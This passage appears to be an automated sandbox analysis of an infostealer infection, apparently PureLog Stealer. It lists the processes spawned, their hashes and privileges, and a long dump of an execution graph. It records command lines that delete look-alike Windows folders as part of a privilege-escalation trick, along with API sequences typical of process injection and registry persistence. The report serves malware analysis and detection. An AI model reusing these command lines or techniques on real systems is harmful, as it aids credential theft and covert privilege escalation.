                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:40
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x350000
                                                                                                                                                                                                                                                                                                                                                    File size:70'656 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:41
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Imagebase:0xee0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:02:12:46
Start date:26/11/2024
Path:C:\Users\Public\Libraries\Juqmtmya.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
Imagebase:0x400000
File size:1'226'752 bytes
MD5 hash:53F0663219E6091CECD600C59389711F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Has exited:true

Target ID:38
Start time:02:12:48
Start date:26/11/2024
Path:C:\Users\Public\alpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Imagebase:0xee0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:02:12:50
Start date:26/11/2024
Path:C:\Users\Public\Libraries\aymtmquJ.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:02:12:51
Start date:26/11/2024
Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Imagebase:0x400000
File size:1'425'408 bytes
MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000028.00000003.1748806295.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:41
Start time:02:12:51
Start date:26/11/2024
Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Imagebase:0x30000
File size:70'656 bytes
MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:02:12:55
Start date:26/11/2024
Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:0x140000000
File size:1'356'800 bytes
MD5 hash:C00D0B962E95984AE63736DD9A6F990E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:02:13:15
Start date:26/11/2024
Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Imagebase:0x2e0000
File size:665'670'656 bytes
MD5 hash:A89798786670C9BBB806311854859FF3
Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:false


Execution Graph

Execution Coverage: 15%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 26.7%
Total number of Nodes: 1856
Total number of Limit Nodes: 15

execution_graph (the rendered graph is omitted; its serialized node/edge data is not readable as text; the listing is cut off mid-stream in this copy). The first node listed is 34124 at 0x2d1c350. The information recoverable from the node labels is the set of Windows API calls recorded on graph nodes:

- Module and symbol resolution: LoadLibraryW, FreeLibrary, GetModuleHandleA, GetModuleHandleW, GetProcAddress
- Timing and connectivity: QueryPerformanceCounter, GetTickCount, InetIsOffline, Sleep
- Memory and thread-local storage: VirtualAlloc, VirtualFree, LocalAlloc, TlsSetValue, TlsGetValue
- Writing into process memory: NtWriteVirtualMemory, FlushInstructionCache
- File I/O through the native API: RtlDosPathNameToNtPathName_U, NtCreateFile, NtWriteFile, NtClose
- Process and handle management: CreateProcessAsUserW, WaitForSingleObject, CloseHandle
- String handling: SysAllocStringLen, SysFreeString, CharNextA

Subroutine nodes that are not expanded carry an "N API calls" summary instead of names, for example 2cf4530 (11 API calls), 2d0798c (12), 2d08274 (15), 2d07e50 (17), 2d07d78 (18), 2d089d0 (20), 2d0894c (21), 2d0d164 (23), 2d0adf8 (29) and 2d05aec (42).
11 API calls 39001->39002 39009 2d18b3e 39002->39009 39010 2d17f60 39003->39010 39008 2cf4860 11 API calls 39004->39008 39006 2cf4860 11 API calls 39005->39006 39012 2d19c08 39006->39012 39013 2d1a0dc 39007->39013 39011 2d19931 39008->39011 39014 2cf47ec 11 API calls 39009->39014 39015 2d089d0 20 API calls 39010->39015 39016 2cf47ec 11 API calls 39011->39016 39017 2cf47ec 11 API calls 39012->39017 39018 2d089d0 20 API calls 39013->39018 39021 2d18b75 39014->39021 39019 2d17f84 39015->39019 39022 2d19968 39016->39022 39023 2d19c3f 39017->39023 39024 2d1a10f 39018->39024 39020 2cf4860 11 API calls 39019->39020 39025 2d17fa5 39020->39025 39026 2d089d0 20 API calls 39021->39026 39027 2d089d0 20 API calls 39022->39027 39028 2d089d0 20 API calls 39023->39028 39029 2d089d0 20 API calls 39024->39029 39031 2cf47ec 11 API calls 39025->39031 39030 2d18b99 39026->39030 39032 2d1998c 39027->39032 39033 2d19c63 39028->39033 39041 2d1a142 39029->39041 39034 2d18ba2 39030->39034 39035 2d18bb9 39030->39035 39043 2d17fdc 39031->39043 39037 2d0e358 11 API calls 39032->39037 39038 2cf4860 11 API calls 39033->39038 39848 2d08730 17 API calls 39034->39848 39036 2cf4860 11 API calls 39035->39036 39048 2d18bda 39036->39048 39040 2d199a1 39037->39040 39046 2d19c84 39038->39046 39042 2cf4530 11 API calls 39040->39042 39047 2d089d0 20 API calls 39041->39047 39044 2d199b1 39042->39044 39049 2d089d0 20 API calls 39043->39049 39045 2cf4860 11 API calls 39044->39045 39054 2d199d2 39045->39054 39050 2cf47ec 11 API calls 39046->39050 39055 2d1a175 39047->39055 39051 2cf47ec 11 API calls 39048->39051 39052 2d18000 39049->39052 39057 2d19cbb 39050->39057 39059 2d18c11 39051->39059 39053 2cf4860 11 API calls 39052->39053 39060 2d18021 39053->39060 39056 2cf47ec 11 API calls 39054->39056 39058 2d089d0 20 API calls 39055->39058 39068 2d19a09 39056->39068 39062 2d089d0 20 API calls 39057->39062 39061 2d1a1a8 39058->39061 39064 2d089d0 20 API calls 39059->39064 39065 2cf47ec 11 API calls 39060->39065 
39063 2cf4860 11 API calls 39061->39063 39066 2d19cdf 39062->39066 39074 2d1a1c9 39063->39074 39067 2d18c35 39064->39067 39075 2d18058 39065->39075 39069 2cf49f8 11 API calls 39066->39069 39070 2cf4860 11 API calls 39067->39070 39072 2d089d0 20 API calls 39068->39072 39071 2d19ce9 39069->39071 39078 2d18c56 39070->39078 39430 2d08d70 39071->39430 39076 2d19a2d 39072->39076 39077 2cf47ec 11 API calls 39074->39077 39080 2d089d0 20 API calls 39075->39080 39079 2cf4860 11 API calls 39076->39079 39085 2d1a200 39077->39085 39081 2cf47ec 11 API calls 39078->39081 39084 2d19a4e 39079->39084 39082 2d1807c 39080->39082 39088 2d18c8d 39081->39088 39083 2cf4860 11 API calls 39082->39083 39090 2d1809d 39083->39090 39086 2cf47ec 11 API calls 39084->39086 39087 2d089d0 20 API calls 39085->39087 39095 2d19a85 39086->39095 39089 2d1a224 39087->39089 39092 2d089d0 20 API calls 39088->39092 39091 2cf4860 11 API calls 39089->39091 39093 2cf47ec 11 API calls 39090->39093 39098 2d1a245 39091->39098 39094 2d18cb1 39092->39094 39099 2d180d4 39093->39099 39096 2cf4860 11 API calls 39094->39096 39097 2d089d0 20 API calls 39095->39097 39100 2d18cd2 39096->39100 39107 2d19aa9 39097->39107 39101 2cf47ec 11 API calls 39098->39101 39102 2d089d0 20 API calls 39099->39102 39103 2cf47ec 11 API calls 39100->39103 39106 2d1a27c 39101->39106 39104 2d180f8 39102->39104 39110 2d18d09 39103->39110 39846 2d0b118 39 API calls 39104->39846 39109 2d089d0 20 API calls 39106->39109 39108 2d0dc8c 17 API calls 39107->39108 39108->38942 39114 2d1a2a0 39109->39114 39112 2d089d0 20 API calls 39110->39112 39111 2d18109 39113 2d18d2d ResumeThread 39112->39113 39115 2cf4860 11 API calls 39113->39115 39116 2d089d0 20 API calls 39114->39116 39119 2d18d59 39115->39119 39117 2d1a2d3 39116->39117 39118 2cf4860 11 API calls 39117->39118 39121 2d1a2f4 39118->39121 39120 2cf47ec 11 API calls 39119->39120 39123 2d18d90 39120->39123 39122 2cf47ec 11 API calls 39121->39122 39126 2d1a32b 39122->39126 39124 2d089d0 20 API calls 
39123->39124 39125 2d18db4 39124->39125 39127 2cf4860 11 API calls 39125->39127 39128 2d089d0 20 API calls 39126->39128 39131 2d18dd5 39127->39131 39129 2d1a34f 39128->39129 39130 2cf4860 11 API calls 39129->39130 39133 2d1a370 39130->39133 39132 2cf47ec 11 API calls 39131->39132 39135 2d18e0c 39132->39135 39134 2cf47ec 11 API calls 39133->39134 39138 2d1a3a7 39134->39138 39136 2d089d0 20 API calls 39135->39136 39137 2d18e30 39136->39137 39139 2cf4860 11 API calls 39137->39139 39140 2d089d0 20 API calls 39138->39140 39143 2d18e51 39139->39143 39141 2d1a3cb 39140->39141 39142 2cf4860 11 API calls 39141->39142 39145 2d1a3ec 39142->39145 39144 2cf47ec 11 API calls 39143->39144 39146 2d18e88 39144->39146 39147 2cf47ec 11 API calls 39145->39147 39148 2d089d0 20 API calls 39146->39148 39150 2d1a423 39147->39150 39149 2d18eac CloseHandle 39148->39149 39151 2cf4860 11 API calls 39149->39151 39152 2d089d0 20 API calls 39150->39152 39153 2d18ed8 39151->39153 39154 2d1a447 39152->39154 39155 2cf47ec 11 API calls 39153->39155 39156 2d089d0 20 API calls 39154->39156 39157 2d18f0f 39155->39157 39159 2d1a47a 39156->39159 39158 2d089d0 20 API calls 39157->39158 39160 2d18f33 39158->39160 39161 2d089d0 20 API calls 39159->39161 39162 2cf4860 11 API calls 39160->39162 39163 2d1a4ad 39161->39163 39164 2d18f54 39162->39164 39165 2d089d0 20 API calls 39163->39165 39166 2cf47ec 11 API calls 39164->39166 39167 2d1a4e0 39165->39167 39168 2d18f8b 39166->39168 39169 2d089d0 20 API calls 39167->39169 39170 2d089d0 20 API calls 39168->39170 39172 2d1a513 39169->39172 39171 2d18faf 39170->39171 39173 2cf4860 11 API calls 39171->39173 39174 2cf4860 11 API calls 39172->39174 39176 2d18fd0 39173->39176 39175 2d1a534 39174->39175 39177 2cf47ec 11 API calls 39175->39177 39178 2cf47ec 11 API calls 39176->39178 39179 2d1a56b 39177->39179 39180 2d19007 39178->39180 39181 2d089d0 20 API calls 39179->39181 39182 2d089d0 20 API calls 39180->39182 39183 2d1a58f 39181->39183 39184 2d1902b 39182->39184 
39185 2cf4860 11 API calls 39183->39185 39186 2cf4860 11 API calls 39184->39186 39187 2d1a5b0 39185->39187 39188 2d1904c 39186->39188 39189 2cf47ec 11 API calls 39187->39189 39190 2cf47ec 11 API calls 39188->39190 39191 2d1a5e7 39189->39191 39192 2d19083 39190->39192 39193 2d089d0 20 API calls 39191->39193 39194 2d089d0 20 API calls 39192->39194 39197 2d1a60b 39193->39197 39195 2d190a7 39194->39195 39196 2cf4860 11 API calls 39195->39196 39198 2d190c8 39196->39198 39199 2d089d0 20 API calls 39197->39199 39200 2cf47ec 11 API calls 39198->39200 39201 2d1a63e 39199->39201 39203 2d190ff 39200->39203 39202 2d089d0 20 API calls 39201->39202 39206 2d1a671 39202->39206 39204 2d089d0 20 API calls 39203->39204 39205 2d19123 39204->39205 39207 2cf4860 11 API calls 39205->39207 39208 2d089d0 20 API calls 39206->39208 39209 2d19144 39207->39209 39211 2d1a6a4 39208->39211 39210 2cf47ec 11 API calls 39209->39210 39213 2d1917b 39210->39213 39212 2d089d0 20 API calls 39211->39212 39214 2d1a6d7 39212->39214 39215 2d089d0 20 API calls 39213->39215 39217 2d089d0 20 API calls 39214->39217 39216 2d1919f 39215->39216 39218 2cf4860 11 API calls 39216->39218 39219 2d1a70a 39217->39219 39221 2d191c0 39218->39221 39220 2cf4860 11 API calls 39219->39220 39222 2d1a72b 39220->39222 39223 2cf47ec 11 API calls 39221->39223 39224 2cf47ec 11 API calls 39222->39224 39225 2d191f7 39223->39225 39226 2d1a762 39224->39226 39227 2d089d0 20 API calls 39225->39227 39229 2d089d0 20 API calls 39226->39229 39228 2d1921b 39227->39228 39232 2d0894c 21 API calls 39228->39232 39230 2d1a786 39229->39230 39231 2cf4860 11 API calls 39230->39231 39236 2d1a7a7 39231->39236 39233 2d1923a 39232->39233 39234 2d0894c 21 API calls 39233->39234 39235 2d1924e 39234->39235 39237 2d0894c 21 API calls 39235->39237 39239 2cf47ec 11 API calls 39236->39239 39238 2d19262 39237->39238 39240 2d0894c 21 API calls 39238->39240 39244 2d1a7de 39239->39244 39241 2d19276 39240->39241 39242 2d0894c 21 API calls 39241->39242 39243 2d1928a 
39242->39243 39245 2d0894c 21 API calls 39243->39245 39247 2d089d0 20 API calls 39244->39247 39246 2d1929e CloseHandle 39245->39246 39248 2cf4860 11 API calls 39246->39248 39249 2d1a802 39247->39249 39251 2d192ca 39248->39251 39250 2cf4860 11 API calls 39249->39250 39252 2d1a823 39250->39252 39253 2cf47ec 11 API calls 39251->39253 39254 2cf47ec 11 API calls 39252->39254 39255 2d19301 39253->39255 39257 2d1a85a 39254->39257 39256 2d089d0 20 API calls 39255->39256 39258 2d19325 39256->39258 39259 2d089d0 20 API calls 39257->39259 39260 2cf4860 11 API calls 39258->39260 39261 2d1a87e 39259->39261 39263 2d19346 39260->39263 39262 2cf4860 11 API calls 39261->39262 39264 2d1a89f 39262->39264 39265 2cf47ec 11 API calls 39263->39265 39266 2cf47ec 11 API calls 39264->39266 39267 2d1937d 39265->39267 39268 2d1a8d6 39266->39268 39269 2d089d0 20 API calls 39267->39269 39270 2d089d0 20 API calls 39268->39270 39269->38725 39271 2d1a8fa 39270->39271 39272 2cf4860 11 API calls 39271->39272 39273 2d1a91b 39272->39273 39274 2cf47ec 11 API calls 39273->39274 39275 2d1a952 39274->39275 39276 2d089d0 20 API calls 39275->39276 39277 2d1a976 39276->39277 39278 2d089d0 20 API calls 39277->39278 39279 2d1a985 39278->39279 39280 2d089d0 20 API calls 39279->39280 39281 2d1a994 39280->39281 39282 2d089d0 20 API calls 39281->39282 39283 2d1a9a3 39282->39283 39284 2d089d0 20 API calls 39283->39284 39285 2d1a9b2 39284->39285 39286 2d089d0 20 API calls 39285->39286 39287 2d1a9c1 39286->39287 39288 2d089d0 20 API calls 39287->39288 39289 2d1a9d0 39288->39289 39290 2d089d0 20 API calls 39289->39290 39291 2d1a9df 39290->39291 39292 2d089d0 20 API calls 39291->39292 39293 2d1a9ee 39292->39293 39294 2d089d0 20 API calls 39293->39294 39295 2d1a9fd 39294->39295 39296 2d089d0 20 API calls 39295->39296 39297 2d1aa0c 39296->39297 39298 2d089d0 20 API calls 39297->39298 39299 2d1aa1b 39298->39299 39300 2d089d0 20 API calls 39299->39300 39301 2d1aa2a 39300->39301 39302 2d089d0 20 API calls 39301->39302 39303 
2d1aa39 39302->39303 39304 2d089d0 20 API calls 39303->39304 39305 2d1aa48 39304->39305 39306 2d089d0 20 API calls 39305->39306 39307 2d1aa57 39306->39307 39308 2cf4860 11 API calls 39307->39308 39309 2d1aa78 39308->39309 39310 2cf47ec 11 API calls 39309->39310 39311 2d1aaaf 39310->39311 39312 2d089d0 20 API calls 39311->39312 39313 2d1aad3 39312->39313 39314 2d089d0 20 API calls 39313->39314 39315 2d1ab06 39314->39315 39316 2d089d0 20 API calls 39315->39316 39317 2d1ab39 39316->39317 39318 2d089d0 20 API calls 39317->39318 39319 2d1ab6c 39318->39319 39320 2d089d0 20 API calls 39319->39320 39321 2d1ab9f 39320->39321 39322 2d089d0 20 API calls 39321->39322 39323 2d1abd2 39322->39323 39324 2d089d0 20 API calls 39323->39324 39325 2d1ac05 39324->39325 39326 2d089d0 20 API calls 39325->39326 39327 2d1ac38 39326->39327 39328 2cf4860 11 API calls 39327->39328 39329 2d1ac59 39328->39329 39330 2cf47ec 11 API calls 39329->39330 39331 2d1ac90 39330->39331 39332 2d089d0 20 API calls 39331->39332 39333 2d1acb4 39332->39333 39334 2cf4860 11 API calls 39333->39334 39335 2d1acd5 39334->39335 39336 2cf47ec 11 API calls 39335->39336 39337 2d1ad0c 39336->39337 39338 2d089d0 20 API calls 39337->39338 39339 2d1ad30 39338->39339 39340 2cf4860 11 API calls 39339->39340 39341 2d1ad51 39340->39341 39342 2cf47ec 11 API calls 39341->39342 39343 2d1ad88 39342->39343 39344 2d089d0 20 API calls 39343->39344 39345 2d1adac 39344->39345 39346 2d089d0 20 API calls 39345->39346 39347 2d1addf 39346->39347 39348 2d089d0 20 API calls 39347->39348 39349 2d1ae12 39348->39349 39350 2d089d0 20 API calls 39349->39350 39351 2d1ae45 39350->39351 39352 2d089d0 20 API calls 39351->39352 39353 2d1ae78 39352->39353 39354 2d089d0 20 API calls 39353->39354 39355 2d1aeab 39354->39355 39356 2d089d0 20 API calls 39355->39356 39357 2d1aede 39356->39357 39358 2d089d0 20 API calls 39357->39358 39359 2d1af11 39358->39359 39360 2d089d0 20 API calls 39359->39360 39361 2d1af44 39360->39361 39362 2d089d0 20 API calls 
39361->39362 39363 2d1af77 39362->39363 39364 2d089d0 20 API calls 39363->39364 39365 2d1afaa 39364->39365 39366 2d089d0 20 API calls 39365->39366 39367 2d1afdd 39366->39367 39368 2d089d0 20 API calls 39367->39368 39369 2d1b010 39368->39369 39370 2d089d0 20 API calls 39369->39370 39371 2d1b043 39370->39371 39372 2d089d0 20 API calls 39371->39372 39373 2d1b076 39372->39373 39374 2d089d0 20 API calls 39373->39374 39375 2d1b0a9 39374->39375 39376 2d089d0 20 API calls 39375->39376 39377 2d1b0dc 39376->39377 39378 2d089d0 20 API calls 39377->39378 39379 2d1b10f 39378->39379 39380 2d089d0 20 API calls 39379->39380 39381 2d1b142 39380->39381 39382 2d089d0 20 API calls 39381->39382 39383 2d1b175 39382->39383 39384 2d08338 18 API calls 39383->39384 39385 2d1b184 39384->39385 39386 2cf4860 11 API calls 39385->39386 39387 2d1b1a5 39386->39387 39388 2cf47ec 11 API calls 39387->39388 39389 2d1b1dc 39388->39389 39390 2d089d0 20 API calls 39389->39390 39391 2d1b200 39390->39391 39392 2cf4860 11 API calls 39391->39392 39393 2d1b221 39392->39393 39394 2cf47ec 11 API calls 39393->39394 39395 2d1b258 39394->39395 39396 2d089d0 20 API calls 39395->39396 39397 2d1b27c 39396->39397 39398 2cf4860 11 API calls 39397->39398 39399 2d1b29d 39398->39399 39400 2cf47ec 11 API calls 39399->39400 39401 2d1b2d4 39400->39401 39402 2d089d0 20 API calls 39401->39402 39403 2d1b2f8 ExitProcess 39402->39403 39410 2d0e114 39404->39410 39405 2d0e197 39406 2cf44dc 11 API calls 39405->39406 39408 2d0e19f 39406->39408 39407 2cf49f8 11 API calls 39407->39410 39409 2cf4530 11 API calls 39408->39409 39411 2d0e1aa 39409->39411 39410->39405 39410->39407 39412 2cf4500 11 API calls 39411->39412 39413 2d0e1c4 39412->39413 39413->38617 39415 2d0f22b 39414->39415 39416 2d0f256 RegOpenKeyA 39415->39416 39417 2d0f264 39416->39417 39418 2cf49f8 11 API calls 39417->39418 39419 2d0f27c 39418->39419 39420 2d0f289 RegSetValueExA RegCloseKey 39419->39420 39421 2d0f2ad 39420->39421 39422 2cf4500 11 API calls 39421->39422 39423 
2d0f2ba 39422->39423 39424 2cf44dc 11 API calls 39423->39424 39425 2d0f2c2 39424->39425 39425->38620 39849 2cf49a0 39426->39849 39429 2cf7e71 39429->38942 39429->38945 39431 2d08d78 39430->39431 39432 2cf4860 11 API calls 39431->39432 39433 2d08dbb 39432->39433 39434 2cf47ec 11 API calls 39433->39434 39435 2d08de0 39434->39435 39436 2d089d0 20 API calls 39435->39436 39437 2d08dfb 39436->39437 39438 2cf4860 11 API calls 39437->39438 39439 2d08e14 39438->39439 39440 2cf47ec 11 API calls 39439->39440 39441 2d08e39 39440->39441 39442 2d089d0 20 API calls 39441->39442 39443 2d08e54 39442->39443 39444 2d0a8b7 39443->39444 39445 2cf4860 11 API calls 39443->39445 39446 2cf4500 11 API calls 39444->39446 39449 2d08e85 39445->39449 39447 2d0a8d4 39446->39447 39448 2cf4500 11 API calls 39447->39448 39450 2d0a8e4 39448->39450 39452 2cf47ec 11 API calls 39449->39452 39451 2cf4c60 SysFreeString 39450->39451 39453 2d0a8ef 39451->39453 39457 2d08eaa 39452->39457 39454 2cf4500 11 API calls 39453->39454 39455 2d0a8ff 39454->39455 39456 2cf44dc 11 API calls 39455->39456 39458 2d0a907 39456->39458 39461 2d089d0 20 API calls 39457->39461 39459 2cf4500 11 API calls 39458->39459 39460 2d0a914 39459->39460 39462 2cf4500 11 API calls 39460->39462 39463 2d08ec5 39461->39463 39465 2d0a921 39462->39465 39464 2cf4860 11 API calls 39463->39464 39466 2d08ede 39464->39466 39465->38788 39467 2cf47ec 11 API calls 39466->39467 39468 2d08f03 39467->39468 39469 2d089d0 20 API calls 39468->39469 39470 2d08f1e 39469->39470 39470->39444 39471 2cf4860 11 API calls 39470->39471 39472 2d08f66 39471->39472 39473 2cf47ec 11 API calls 39472->39473 39474 2d08f8b 39473->39474 39475 2d089d0 20 API calls 39474->39475 39476 2d08fa6 39475->39476 39477 2cf4860 11 API calls 39476->39477 39478 2d08fbf 39477->39478 39479 2cf47ec 11 API calls 39478->39479 39480 2d08fe4 39479->39480 39481 2d089d0 20 API calls 39480->39481 39482 2d08fff 39481->39482 39483 2cf4860 11 API calls 39482->39483 39484 2d09044 39483->39484 39485 
2cf47ec 11 API calls 39484->39485 39486 2d09069 39485->39486 39487 2d089d0 20 API calls 39486->39487 39488 2d09084 39487->39488 39489 2cf4860 11 API calls 39488->39489 39490 2d0909d 39489->39490 39491 2cf47ec 11 API calls 39490->39491 39492 2d090c5 39491->39492 39493 2d089d0 20 API calls 39492->39493 39494 2d090e3 39493->39494 39495 2cf4860 11 API calls 39494->39495 39496 2d090ff 39495->39496 39497 2cf47ec 11 API calls 39496->39497 39498 2d09130 39497->39498 39499 2d089d0 20 API calls 39498->39499 39500 2d09154 39499->39500 39501 2cf4860 11 API calls 39500->39501 39502 2d09170 39501->39502 39503 2cf47ec 11 API calls 39502->39503 39504 2d091a1 39503->39504 39505 2d089d0 20 API calls 39504->39505 39506 2d091c5 39505->39506 39507 2cf4860 11 API calls 39506->39507 39508 2d091e1 39507->39508 39509 2cf47ec 11 API calls 39508->39509 39510 2d09212 39509->39510 39511 2d089d0 20 API calls 39510->39511 39512 2d09236 39511->39512 39513 2d08788 18 API calls 39512->39513 39514 2d09273 39513->39514 39515 2d092e8 39514->39515 39517 2cf4860 11 API calls 39514->39517 39516 2cf4860 11 API calls 39515->39516 39519 2d09304 39516->39519 39518 2d09293 39517->39518 39521 2cf47ec 11 API calls 39518->39521 39520 2cf47ec 11 API calls 39519->39520 39522 2d09335 39520->39522 39523 2d092c4 39521->39523 39524 2d089d0 20 API calls 39522->39524 39525 2d089d0 20 API calls 39523->39525 39526 2d09359 39524->39526 39525->39515 39527 2d089d0 20 API calls 39526->39527 39528 2d0938c 39527->39528 39529 2cf4860 11 API calls 39528->39529 39530 2d093a8 39529->39530 39531 2cf47ec 11 API calls 39530->39531 39532 2d093d9 39531->39532 39533 2d089d0 20 API calls 39532->39533 39534 2d093fd 39533->39534 39535 2cf4860 11 API calls 39534->39535 39536 2d09419 39535->39536 39537 2cf47ec 11 API calls 39536->39537 39538 2d0944a 39537->39538 39539 2d089d0 20 API calls 39538->39539 39540 2d0946e 39539->39540 39541 2cf2ee0 2 API calls 39540->39541 39542 2d09473 39541->39542 39543 2cf4860 11 API calls 39542->39543 39544 
2d094b6 39543->39544 39545 2cf47ec 11 API calls 39544->39545 39546 2d094e7 39545->39546 39547 2d089d0 20 API calls 39546->39547 39548 2d0950b 39547->39548 39549 2cf4860 11 API calls 39548->39549 39550 2d09527 39549->39550 39551 2cf47ec 11 API calls 39550->39551 39552 2d09558 39551->39552 39553 2d089d0 20 API calls 39552->39553 39554 2d0957c 39553->39554 39555 2cf4860 11 API calls 39554->39555 39556 2d09598 39555->39556 39557 2cf47ec 11 API calls 39556->39557 39558 2d095c9 39557->39558 39559 2d089d0 20 API calls 39558->39559 39560 2d095ed GetThreadContext 39559->39560 39560->39444 39561 2d0960f 39560->39561 39562 2cf4860 11 API calls 39561->39562 39563 2d0962b 39562->39563 39564 2cf47ec 11 API calls 39563->39564 39565 2d0965c 39564->39565 39566 2d089d0 20 API calls 39565->39566 39567 2d09680 39566->39567 39568 2cf4860 11 API calls 39567->39568 39569 2d0969c 39568->39569 39570 2cf47ec 11 API calls 39569->39570 39571 2d096cd 39570->39571 39572 2d089d0 20 API calls 39571->39572 39573 2d096f1 39572->39573 39574 2cf4860 11 API calls 39573->39574 39575 2d0970d 39574->39575 39576 2cf47ec 11 API calls 39575->39576 39577 2d0973e 39576->39577 39578 2d089d0 20 API calls 39577->39578 39579 2d09762 39578->39579 39580 2cf4860 11 API calls 39579->39580 39581 2d0977e 39580->39581 39582 2cf47ec 11 API calls 39581->39582 39583 2d097af 39582->39583 39584 2d089d0 20 API calls 39583->39584 39585 2d097d3 39584->39585 39586 2cf4860 11 API calls 39585->39586 39587 2d097ef 39586->39587 39588 2cf47ec 11 API calls 39587->39588 39589 2d09820 39588->39589 39590 2d089d0 20 API calls 39589->39590 39591 2d09844 39590->39591 39851 2d08400 39591->39851 39594 2d09878 39596 2cf4860 11 API calls 39594->39596 39595 2d09b7f 39597 2cf4860 11 API calls 39595->39597 39599 2d09894 39596->39599 39598 2d09b9b 39597->39598 39600 2cf47ec 11 API calls 39598->39600 39601 2cf47ec 11 API calls 39599->39601 39602 2d09bcc 39600->39602 39603 2d098c5 39601->39603 39604 2d089d0 20 API calls 39602->39604 39605 2d089d0 20 
API calls 39603->39605 39606 2d09b78 39604->39606 39607 2d098e9 39605->39607 39609 2cf4860 11 API calls 39606->39609 39608 2cf4860 11 API calls 39607->39608 39611 2d09905 39608->39611 39610 2d09c0c 39609->39610 39612 2cf47ec 11 API calls 39610->39612 39613 2cf47ec 11 API calls 39611->39613 39614 2d09c3d 39612->39614 39615 2d09936 39613->39615 39616 2d089d0 20 API calls 39614->39616 39617 2d089d0 20 API calls 39615->39617 39618 2d09c61 39616->39618 39619 2d0995a 39617->39619 39620 2cf4860 11 API calls 39618->39620 39621 2cf4860 11 API calls 39619->39621 39623 2d09c7d 39620->39623 39622 2d09976 39621->39622 39625 2cf47ec 11 API calls 39622->39625 39624 2cf47ec 11 API calls 39623->39624 39626 2d09cae 39624->39626 39627 2d099a7 39625->39627 39628 2d089d0 20 API calls 39626->39628 39629 2d089d0 20 API calls 39627->39629 39630 2d09cd2 39628->39630 39631 2d099cb 39629->39631 39632 2cf4860 11 API calls 39630->39632 39865 2d08670 39631->39865 39640 2d09cee 39632->39640 39635 2d099e3 39638 2d07a2c 18 API calls 39635->39638 39636 2d09a0b 39637 2cf4860 11 API calls 39636->39637 39643 2d09a27 39637->39643 39639 2d09a04 39638->39639 39641 2cf4860 11 API calls 39639->39641 39642 2cf47ec 11 API calls 39640->39642 39646 2d09a98 39641->39646 39645 2d09d1f 39642->39645 39644 2cf47ec 11 API calls 39643->39644 39650 2d09a58 39644->39650 39647 2d089d0 20 API calls 39645->39647 39648 2cf47ec 11 API calls 39646->39648 39649 2d09d43 39647->39649 39654 2d09ac9 39648->39654 39651 2d07a2c 18 API calls 39649->39651 39653 2d089d0 20 API calls 39650->39653 39652 2d09d64 39651->39652 39652->39444 39655 2cf4860 11 API calls 39652->39655 39653->39639 39656 2d089d0 20 API calls 39654->39656 39659 2d09d92 39655->39659 39657 2d09aed 39656->39657 